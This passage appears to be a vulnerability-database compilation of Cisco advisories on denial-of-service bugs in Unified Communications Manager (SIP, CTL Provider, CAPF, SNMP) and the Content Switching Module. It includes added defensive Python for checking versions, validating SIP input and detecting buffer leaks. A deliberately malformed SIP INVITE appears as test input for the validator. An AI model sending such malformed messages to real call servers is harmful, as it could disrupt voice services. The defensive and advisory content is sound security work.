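        (4, 1): (4, 1, 3, 6),     # 4.1(3)SR6
        (4, 2): (4, 2, 3, 3),     # 4.2(3)SR3
        (4, 3): (4, 3, 2, 0),     # 4.3(2)
        (5, None): (5, 1, 3, 0),  # 5.1(3)
        (6, None): (6, 1, 1, 0),  # 6.1(1)
    },
    "CVE-2008-1748": {
        (4, 1): (4, 1, 3, 7),     # 4.1(3)SR7
        (4, 2): (4, 2, 3, 4),     # 4.2(3)SR4
        (4, 3): (4, 3, 2, 0),     # 4.3(2)
        (5, None): (5, 1, 3, 0),  # 5.1(3)
        (6, None): (6, 1, 1, 0),  # 6.1(1)
    },
}

_PAREN = re.compile(r"^(\d+)\.(\d+)\((\d+)\)(?:\s*SR(\d+))?$", re.I)
_DOTTED = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:\.\d+(?:-\d+)?)?$")


def parse_version(text):
    """Return (major, minor, maint, sr) or None if the format is unknown."""
    text = text.strip()
    if ":" in text:                      # strip an "Active Master Version:" label
        text = text.split(":", 1)[1].strip()
    m = _PAREN.match(text)
    if m:
        major, minor, maint, sr = m.groups()
        return (int(major), int(minor), int(maint), int(sr or 0))
    m = _DOTTED.match(text)
    if m:
        major, minor, maint = (int(x) for x in m.groups())
        return (major, minor, maint, 0)
    return None


def is_vulnerable(version, cve):
    """True if `version` is below the first fixed release of its train for
    `cve`. Trains the advisory does not name (e.g. 7.x) return False;
    unparseable input raises ValueError rather than silently passing."""
    parsed = parse_version(version)
    if parsed is None:
        raise ValueError(f"unrecognised CUCM version: {version!r}")
    table = FIXED[cve]
    fixed = table.get(parsed[:2]) or table.get((parsed[0], None))
    if fixed is None:
        return False
    return parsed < fixed   # tuple comparison: major, minor, maint, then SR


def check(version):
    """Map each CVE on this page to True/False for one version string."""
    return {cve: is_vulnerable(version, cve) for cve in FIXED}


if __name__ == "__main__":
    # 4.1(3)SR6 fixes CSCsk46944 but is still one SR short for CSCsl22355.
    for v in ("4.1(3)SR5", "4.1(3)SR6", "4.1(3)SR7", "5.1.2.3000-2",
              "Active Master Version: 6.1.1.2000-3"):
        print(v, check(v))
```

The point of carrying both CVEs in one table is that a 4.1(3)SR6 or 4.2(3)SR3 system is fixed for CVE-2008-1747 but still exposed to CVE-2008-1748, which a single "am I on a fixed release" check would miss. Unknown version strings raise rather than return False so that a typo in an inventory cannot be read as "not affected".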
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications.
The advisory covers seven denial-of-service vulnerabilities in four
services. The affected services, their default listeners, and whether a
workaround exists:
* CTL Provider (CSCsj80609, CSCsi98433): listens by default on TCP port
  2444 (user configurable); enabled by default; workarounds exist.
* CAPF (CSCsk46770): listens by default on TCP port 3804 (user
  configurable); disabled by default; a workaround exists.
* SIP (CSCsi48115, CSCsk46944, CSCsl22355): no workaround; see the
  filtering guidance under Workarounds.
* SNMP Trap Agent (CSCsj24113): listens by default on UDP port 61441;
  a workaround exists.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
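Three of the bugs above are SIP input-validation failures: a malformed Join header (CSCsi48115) and an improperly validated SIP URL (CSCsl22355) each restart call processing. The advisory does not say what input triggers them, so the Python below is an added example of the defensive side only; it is not Cisco code and not a reproduction. It validates the Request-URI against the RFC 3261 SIP-URI shape and the Join header against RFC 3911 (exactly one to-tag and one from-tag) and rejects the message before it would reach call handling. The two INVITE messages, hostnames and addresses are constructed for the example.

```python
"""Added example, not code from the Cisco advisory: strict validation of
the two SIP inputs named in the bug titles above (Join header,
CSCsi48115; SIP URL, CSCsl22355). Grammar follows RFC 3261 (SIP-URI)
and RFC 3911 (Join). The INVITE messages, hosts and addresses below are
constructed for this example."""
import re

# RFC 3261 token characters.
TOKEN = r"[A-Za-z0-9\-.!%*_+`'~]+"
_TOKEN_RE = re.compile(rf"^{TOKEN}$")
# sip(s):[user@]host[:port][;param[=value]]*[?headers]
# host is a hostname/IPv4 or a bracketed IPv6 literal; port is checked
# numerically below because a regex alone cannot bound it to 65535.
_SIP_URI_RE = re.compile(
    rf"^(?P<scheme>sips?):"
    rf"(?:(?P<user>[^@\s;?]+)@)?"
    rf"(?P<host>\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.\-]+)"
    rf"(?::(?P<port>\d{{1,5}}))?"
    rf"(?P<params>(?:;{TOKEN}(?:={TOKEN})?)*)"
    rf"(?P<headers>\?\S*)?$"
)


def validate_sip_uri(uri):
    """True if `uri` is a well-formed SIP or SIPS URI with a sane port."""
    m = _SIP_URI_RE.match(uri)
    if not m:
        return False
    port = m.group("port")
    return port is None or 1 <= int(port) <= 65535


def validate_join_header(value):
    """True if a Join header value is well formed per RFC 3911: a Call-ID
    followed by parameters with exactly one to-tag and one from-tag."""
    parts = [p.strip() for p in value.split(";")]
    call_id = parts[0]
    if not call_id or any(c.isspace() for c in call_id):
        return False
    seen = {"to-tag": 0, "from-tag": 0}
    for param in parts[1:]:
        name, eq, val = param.partition("=")
        if not _TOKEN_RE.match(name):
            return False
        if name in seen:                    # tag values must be tokens
            if not eq or not _TOKEN_RE.match(val):
                return False
            seen[name] += 1
        elif eq and not val:                # generic-param with empty value
            return False
    return seen["to-tag"] == 1 and seen["from-tag"] == 1


def check_invite(raw):
    """Return a list of validation problems for a raw SIP request; an empty
    list means the Request-URI and any Join header are acceptable. A
    front end that rejects on a non-empty list keeps malformed input away
    from call processing, which is the failure mode behind the SIP bugs."""
    problems = []
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    start = lines[0].split(" ")
    if len(start) != 3 or start[2] != "SIP/2.0":
        return ["malformed request line"]
    if not validate_sip_uri(start[1]):
        problems.append(f"bad Request-URI: {start[1]!r}")
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            problems.append(f"header without colon: {line!r}")
        elif name.strip().lower() == "join" and not validate_join_header(value.strip()):
            problems.append(f"bad Join header: {value.strip()!r}")
    return problems


# Constructed sample messages (not from the advisory).
GOOD_INVITE = (
    "INVITE sip:2001@cucm.example.net:5060;transport=tcp SIP/2.0\r\n"
    "Via: SIP/2.0/TCP 192.0.2.10:5060;branch=z9hG4bK776\r\n"
    "From: <sip:1001@192.0.2.10>;tag=a1\r\n"
    "To: <sip:2001@cucm.example.net>\r\n"
    "Call-ID: abc123@192.0.2.10\r\n"
    "CSeq: 1 INVITE\r\n"
    "Join: 98765@192.0.2.20;to-tag=x1;from-tag=y2\r\n"
    "\r\n"
)
# Out-of-range port in the Request-URI and a Join header with no Call-ID
# and two to-tags.
BAD_INVITE = (
    "INVITE sip:2001@cucm.example.net:99999 SIP/2.0\r\n"
    "Via: SIP/2.0/TCP 192.0.2.10:5060;branch=z9hG4bK777\r\n"
    "Call-ID: def456@192.0.2.10\r\n"
    "Join: ;to-tag=x1;to-tag=x2\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print("good:", check_invite(GOOD_INVITE))
    print("bad: ", check_invite(BAD_INVITE))
```

The validator is deliberately stricter than a lenient parser: it bounds the port numerically, requires the Join tags to be RFC 3261 tokens, and treats a missing or duplicated tag as a hard reject rather than a best-effort match. Placing such a check in front of the call-processing service (a SIP-aware border element, or the server's own parser) is the generic fix for this class of bug; the advisory's own remedy is the fixed release.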
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. Fixed software can be downloaded
from the following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices. If the CTL Provider
service is enabled, permit access to TCP port 2444 only between the
Cisco Unified Communications Manager systems where the CTL Provider
service is active and the CTL Client, usually on the administrator's
workstation, to mitigate the CTL Provider service overflow.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service.
Obtaining Fixed Software
========================
Prior to deploying software, customers should consult their
maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
VAR-200805-0212 | CVE-2008-1748 | Cisco Unified Communications Manager Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Unified Communications Manager 4.1 before 4.1(3)SR7, 4.2 before 4.2(3)SR4, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) does not properly validate SIP URLs, which allows remote attackers to cause a denial of service (service interruption) via a SIP INVITE message, aka Bug ID CSCsl22355. Cisco Unified Communications Manager contains a denial-of-service (DoS) vulnerability, tracked as Bug ID CSCsl22355. Refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. Cisco CUCM 4.1 prior to 4.1(3)SR7, 4.2 prior to 4.2(3)SR4, 4.3 prior to 4.3(2), 5.x prior to 5.1(3), and 6.x prior to 6.1(1) contain an input validation vulnerability caused by not validating SIP URLs properly. ----------------------------------------------------------------------
Source: the same Cisco advisory (cisco-sa-20080514-cucmdos) reproduced
under VAR-200805-0211 above. The CAPF detail it gives:
Certificate Authority Proxy Function Related Vulnerability
The Certificate Authority Proxy Function (CAPF) service of Cisco
Unified Communications Manager versions 4.1, 4.2 and 4.3 contains a
vulnerability when handling malformed input that may result in a DoS
condition. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability.
VAR-200805-0213 | CVE-2008-1749 | Cisco Content Switching Module (CSM) and CSM-S Memory Leak Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in Cisco Content Switching Module (CSM) 4.2(3) up to 4.2(8) and Cisco Content Switching Module with SSL (CSM-S) 2.1(2) up to 2.1(7) allows remote attackers to cause a denial of service (memory consumption) via TCP segments with an unspecified combination of TCP flags. This issue occurs when CSM and CSM-S are configured to use layer 7 load balancing.
An attacker can exploit this issue to cause devices using the module to stop accepting TCP connections or to overload, denying service to legitimate users. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
SOLUTION:
Update to the fixed versions.
Cisco CSM 4.2.9:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csm?psrtdcat20e2
Cisco CSM-S 2.1.8:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csms?psrtdcat20e2
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Cisco has released free software updates that address this
vulnerability.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml.
Affected Products
=================
Vulnerable Products
+------------------
The Cisco CSM and Cisco CSM-S are affected by the vulnerability
described in this document if they are running an affected software
version and are configured for layer 7 load balancing.
The following versions of the Cisco CSM software are affected by this
vulnerability: 4.2(3), 4.2(3a), 4.2(4), 4.2(5), 4.2(6), 4.2(7), and
4.2(8).
The following versions of the Cisco CSM-S software are also affected by
this vulnerability: 2.1(2), 2.1(3), 2.1(4), 2.1(5), 2.1(6), and 2.1(7).
To determine the software version in use by the CSM or CSM-S, log into
the supervisor of the chassis that hosts the CSM or CSM-S modules and
issue the command "show module version" (Cisco IOS) or "show version"
(Cisco CatOS). CSM modules will display as model "WS-X6066-SLB-APC",
CSM-S modules will display as model "WS-X6066-SLB-S-K9", and the
software version will be indicated next to the "Sw:" label.
Note that the output from "show module version" (for Cisco IOS) is
slightly different from the output from "show version" (for Cisco
CatOS). However, in both cases the model names will read as previously
described, and the software version will be easily identified by looking
for the "Sw:" label.
The following example shows a CSM in slot number 4 running software
version 4.2(3):
switch>show module version
Mod Port Model              Serial #    Versions
+--- ---- ------------------ ----------- -------------------------------------
  1    3 WS-SVC-AGM-1-K9    SAD092601W5 Hw : 1.0
                                        Fw : 7.2(1)
                                        Sw : 5.0(3)
  2    6 WS-SVC-FWM-1       SAD093200X8 Hw : 3.0
                                        Fw : 7.2(1)
                                        Sw : 3.2(3)1
  3    8 WS-SVC-IDSM-2      SAD0932089Z Hw : 5.0
                                        Fw : 7.2(1)
                                        Sw : 5.1(6)E1
  4    4 WS-X6066-SLB-APC   SAD093004BD Hw : 1.7
                                        Fw :
                                        Sw : 4.2(3)
  5    2 WS-SUP720-3B       SAL0934888E Hw : 4.4
                                        Fw : 8.1(3)
                                        Sw : 12.2(18)SXF11
                                        Sw1: 8.6(0.306)R3V15
       WS-SUP720            SAL09348488 Hw : 2.3
                                        Fw : 12.2(17r)S2
                                        Sw : 12.2(18)SXF11
       WS-F6K-PFC3B         SAL0934882R Hw : 2.1
A Cisco CSM or CSM-S is configured for layer 7 load balancing if one or
more layer 7 Server Load Balancing (SLB) policies are referenced in the
configuration of a virtual server. There are six possible types of SLB
policies: "client-group", "cookie-map", "header-map", "reverse-sticky",
"sticky-group", and "url-map". Of these, the "client-group" policy
type is always a layer 4 policy. The remaining policy types are
layer 7 policies and, if used, would render a device affected by the
vulnerability described in this document. The following configuration
excerpt shows a CSM that is affected: the SLB policy "TEST-SPORTS-50"
uses the "url-map" and "header-map" layer 7 policy types and is applied
to the virtual server named "WEB":
module ContentSwitchingModule 5
[...]
!
 policy TEST-SPORTS-50
  url-map SPORTS
  header-map TEST
  client-group 50
  serverfarm WEBFARM2
!
 vserver WEB
  virtual 10.20.221.100 tcp www
  serverfarm WEBFARM
  persistent rebalance
  slb-policy TEST-SPORTS-50
  inservice
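The two checks above (the module's software version from "show module version", and whether any in-service virtual server references a layer 7 SLB policy) can be run against saved CLI output instead of by eye. The following Python is an added example and is not Cisco's code or tooling: the affected and fixed version lists are the ones stated in this advisory, the sample outputs are constructed for the example from the advisory's own excerpts, and the configuration parser assumes the running configuration is indented one space per nesting level as the supervisor prints it (the flattened text above does not preserve that indentation).

```python
"""Triage helper for cisco-sa-20080514-csm (CVE-2008-1749); added example, not Cisco code.
It mechanises the advisory's two checks: read the model and "Sw :" version of each CSM /
CSM-S from "show module version", then find in-service vservers whose slb-policy uses a
layer 7 SLB policy type. The sample outputs below are constructed for this example."""
import re

AFFECTED = {
    "WS-X6066-SLB-APC": {"4.2(3)", "4.2(3a)", "4.2(4)", "4.2(5)", "4.2(6)", "4.2(7)", "4.2(8)"},
    "WS-X6066-SLB-S-K9": {"2.1(2)", "2.1(3)", "2.1(4)", "2.1(5)", "2.1(6)", "2.1(7)"},
}
FIXED = {"WS-X6066-SLB-APC": "4.2(9)", "WS-X6066-SLB-S-K9": "2.1(8)"}
LAYER7 = {"cookie-map", "header-map", "reverse-sticky", "sticky-group", "url-map"}
SLOT_LINE = re.compile(r"^\s*(\d+)\s+\d+\s+(WS-\S+)\s+\S+")  # "Mod Port Model Serial #" row

# Constructed "show module version" excerpt (Cisco IOS supervisor); slot 4 is a CSM.
SHOW_MODULE_VERSION = """\
Mod Port Model              Serial #    Versions
  2    6 WS-SVC-FWM-1       SAD093200X8 Hw : 3.0
                                        Fw : 7.2(1)
                                        Sw : 3.2(3)1
  4    4 WS-X6066-SLB-APC   SAD093004BD Hw : 1.7
                                        Fw :
                                        Sw : 4.2(3)
"""

# Constructed CSM configuration fragment: WEB is layer 7, FTP is layer 4 only.
CSM_CONFIG = """\
module ContentSwitchingModule 4
 policy L4-ONLY
  client-group 50
 policy TEST-SPORTS-50
  url-map SPORTS
  header-map TEST
  client-group 50
 vserver WEB
  virtual 10.20.221.100 tcp www
  slb-policy TEST-SPORTS-50
  inservice
 vserver FTP
  virtual 10.20.221.101 tcp ftp
  slb-policy L4-ONLY
  inservice
"""


def find_csm_modules(show_module_version):
    """Return {slot: (model, sw_version)} for every CSM / CSM-S in the output."""
    modules, current = {}, None
    for line in show_module_version.splitlines():
        row = SLOT_LINE.match(line)
        if row:  # a module row; remember it only if the model is a CSM / CSM-S
            current = (int(row.group(1)), row.group(2)) if row.group(2) in AFFECTED else None
            continue
        sw = re.search(r"\bSw\s*:\s*(\S+)", line)
        if current and sw:  # the first "Sw :" line after the row is that module's software
            modules[current[0]] = (current[1], sw.group(1))
            current = None
    return modules


def layer7_vservers(config):
    """Map each in-service vserver to the layer 7 policy types its slb-policy uses."""
    blocks = {"policy": {}, "vserver": {}}
    kind, header_indent, block = None, 0, None
    for raw in config.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        indent = len(raw) - len(raw.lstrip())
        words = raw.split()
        if kind and indent <= header_indent:  # a dedent closes the current block
            kind = None
        if kind is None:
            if words[0] in blocks and len(words) == 2:
                kind, header_indent = words[0], indent
                block = blocks[kind][words[1]] = {"types": set(), "slb": [], "inservice": False}
            continue
        if kind == "policy" and words[0] in LAYER7:
            block["types"].add(words[0])
        elif kind == "vserver" and words[0] == "slb-policy" and len(words) == 2:
            block["slb"].append(words[1])
        elif kind == "vserver" and words[0] == "inservice":
            block["inservice"] = True
    result = {}
    for vs, info in blocks["vserver"].items():
        l7 = {t for p in info["slb"] for t in blocks["policy"].get(p, {"types": ()})["types"]}
        if info["inservice"] and l7:
            result[vs] = sorted(l7)
    return result


def assess(show_module_version, config):
    """Vulnerable only if the software version is affected AND layer 7 load balancing is in use."""
    l7 = layer7_vservers(config)
    report = {}
    for slot, (model, sw) in find_csm_modules(show_module_version).items():
        affected = sw in AFFECTED[model]
        report[slot] = {"model": model, "sw": sw, "upgrade_to": FIXED[model],
                        "layer7_vservers": l7, "vulnerable": affected and bool(l7)}
    return report
```

assess() flags a module only when both conditions hold: a CSM on 4.2(3) whose virtual servers reference nothing but "client-group" policies is not affected, and a module already on the fixed release is never flagged regardless of its configuration. For a chassis with several CSMs, run layer7_vservers() once per "module ContentSwitchingModule" section.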
Products Confirmed Not Vulnerable
+--------------------------------
Only Cisco CSM modules running indicated 4.2 versions are affected by
this vulnerability. CSM software versions 4.1, 3.2 and 3.1 are not
affected by this vulnerability.
Cisco CSM-S modules running indicated 2.1 versions are the only
vulnerable versions of software for that product.
The Cisco IOS SLB feature is not affected by this vulnerability.
No other Cisco products are currently known to be affected by this
vulnerability. The Cisco Secure Content Accelerator is not affected by
this vulnerability.
Details
=======
The Cisco CSM is an integrated SLB line card for the Catalyst 6500 and
7600 Series that is designed to enhance the response time for client
traffic to end points including servers, caches, firewalls, Secure
Sockets Layer (SSL) devices, and VPN termination devices.
The Cisco CSM-S combines high-performance SLB with SSL offload. The
CSM-S is similar to the CSM; however, unlike the CSM, the CSM-S can
terminate and initiate SSL-encrypted traffic. This ability allows the
CSM-S to perform intelligent load balancing while ensuring secure
end-to-end encryption.
The memory leak can be detected by issuing the command "show module
ContentSwitchingModule <slot #> tech-support all | include Outstanding"
on the supervisor and checking the command output for a high number of
outstanding buffers as seen in the following example:
switch#show module ContentSwitchingModule 10 tech-support all | include Outstanding
Outstanding slowpath(low pri) buffers           0          0
Outstanding slowpath(high pri) buffers          0          0
Outstanding blocks                              0          0
Outstanding small buffers                       0          0
Outstanding medium buffers                    823          0
Outstanding large buffers                       0          0
Outstanding sessions                            0          0
Outstanding Closes                              0          0
Close Relinquish Outstanding                    0
Because small, medium, and large buffers can be affected by the memory
leak, administrators are advised to check the number of these buffers in
the output from the preceding command to accurately detect a memory leak
condition.
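A single capture is only a snapshot; because the leak accumulates, the practical signal is two captures of the same command taken some minutes apart with the small, medium or large buffer counts still rising. The following Python is an added example, not Cisco code: it parses those three "Outstanding ... buffers" lines and reports the classes that grew. It assumes the first numeric column is the current count (the advisory does not say what the second column means) and uses a growth threshold that the advisory does not give; both captures are constructed, the first mirroring the output shown above.

```python
"""Spot the CSM buffer leak from two "| include Outstanding" captures; added example, not Cisco code.
Assumptions: the first numeric column is the current count, and min_growth is a tunable
threshold the advisory does not supply. Both captures below are constructed."""
import re

BUFFER_LINE = re.compile(r"^Outstanding (small|medium|large) buffers\s+(\d+)\s+(\d+)\s*$", re.M)

CAPTURE_T0 = """\
Outstanding slowpath(low pri) buffers           0          0
Outstanding slowpath(high pri) buffers          0          0
Outstanding blocks                              0          0
Outstanding small buffers                       0          0
Outstanding medium buffers                    823          0
Outstanding large buffers                       0          0
Outstanding sessions                            0          0
Outstanding Closes                              0          0
Close Relinquish Outstanding                    0
"""
# Same module some time later: medium buffers are still climbing.
CAPTURE_T1 = re.sub(r"medium buffers(\s+)823", r"medium buffers\g<1>4117", CAPTURE_T0)


def outstanding_buffers(capture):
    """{'small': n, 'medium': n, 'large': n} read from the first numeric column."""
    return {size: int(current) for size, current, _second in BUFFER_LINE.findall(capture)}


def leak_suspects(before, after, min_growth=500):
    """Buffer classes whose outstanding count rose by at least min_growth between captures."""
    b, a = outstanding_buffers(before), outstanding_buffers(after)
    return {size: (b[size], a[size]) for size in ("small", "medium", "large")
            if size in b and size in a and a[size] - b[size] >= min_growth}
```

Run it from a scheduled job that stores the previous capture; a non-empty result from leak_suspects() is the point at which to plan the module reset described under Workarounds, before the module stops passing traffic on its own.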
This vulnerability is documented in Cisco Bug ID CSCsl40722 and has been
assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-1749.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss.
* CSM: Potential buffer loss with irregular client streams (CSCsl40722)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of this vulnerability against a system running
a vulnerable version of the Cisco CSM or the Cisco CSM-S software may
cause the CSM or CSM-S to stop passing traffic. Repeated attacks may
result in a prolonged DoS condition, which could affect the services
